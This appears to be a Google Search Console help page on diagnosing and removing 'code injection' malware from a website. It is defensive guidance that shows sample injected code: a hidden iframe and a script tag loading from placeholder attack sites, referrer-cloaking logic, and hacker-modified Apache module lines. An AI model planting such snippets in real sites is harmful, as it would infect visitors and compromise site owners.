Malware infection type: Code injection

What does it mean to have pages marked with malware infection type "Code injection" in Google Search Console?

This means that pages on your site were modified to include malicious code, such as an iframe to a malware attack site.

For more general information on malware, see Assess the damage (hacked with malware).

How do I investigate the "code injection" malware type?

First, avoid using a browser to view infected pages on your site. Because malware often spreads by exploiting browser vulnerabilities, opening an infected malware page in a browser may damage your computer.

Consider confirming the behavior by using cURL or Wget to perform HTTP requests (for example, to fetch a page). These freely available tools are helpful in diagnosting redirects, and have the flexibility to include referrer or user-agent information. By serving malicious content only to users with specific user-agents or referrers, the hacker can target more "real people" and can better avoid detection from site owners and malware scanners. (Your site will need to be online to use these tools.)

For example:

$curl -v --referer <referer-field> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <your-url>

Or, with an example value:

$curl -v --referer "" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30"

Next, log in to your filesystem. Investigate all resources that write to the "code injection" infected URLs. Some examples of malicious code injections the following:

<iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
  style="display:none" width="0"></iframe>
<script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
  if (document.referrer.match(/google\.com/)) {
#httpd.conf modified by the hacker
LoadModule harmful_module modules/
AddModule mod_harmful.c
  • iframe to an attack site
  • JavaScript or another scripting language that calls and runs scripts from an attack site
  • Scripting that redirects the browser to an attack site
  • Malicious code that’s obfuscated to avoid detection
  • Shared object files designed to randomly write harmful code to otherwise benign scripts

Investigate all possible harmful code present on the site. It may be helpful to search for words like [iframe] to find iframe code. Other helpful keywords are "script", "eval", and "unescape." For example, on Unix-based systems:

$grep -irn "iframe" ./ | less

How do I clean my site of the "code injection" malware type?

When ready to clean up your site, you can either replace affected files with the last good backup or you can remove the code injection from each page and all related scripting functions or files. If you modified server configuration files, you may need to restart your webserver for the changes to become effective.

Please be aware that removing the malicious code doesn't address the underlying vulnerability that allowed the hacker to initially compromise your site. Without correcting the root cause, your site may be compromised again in the future. For more information on cleaning your entire site, not just this malware type, see Help for Hacked Sites.

Was this helpful?
How can we improve it?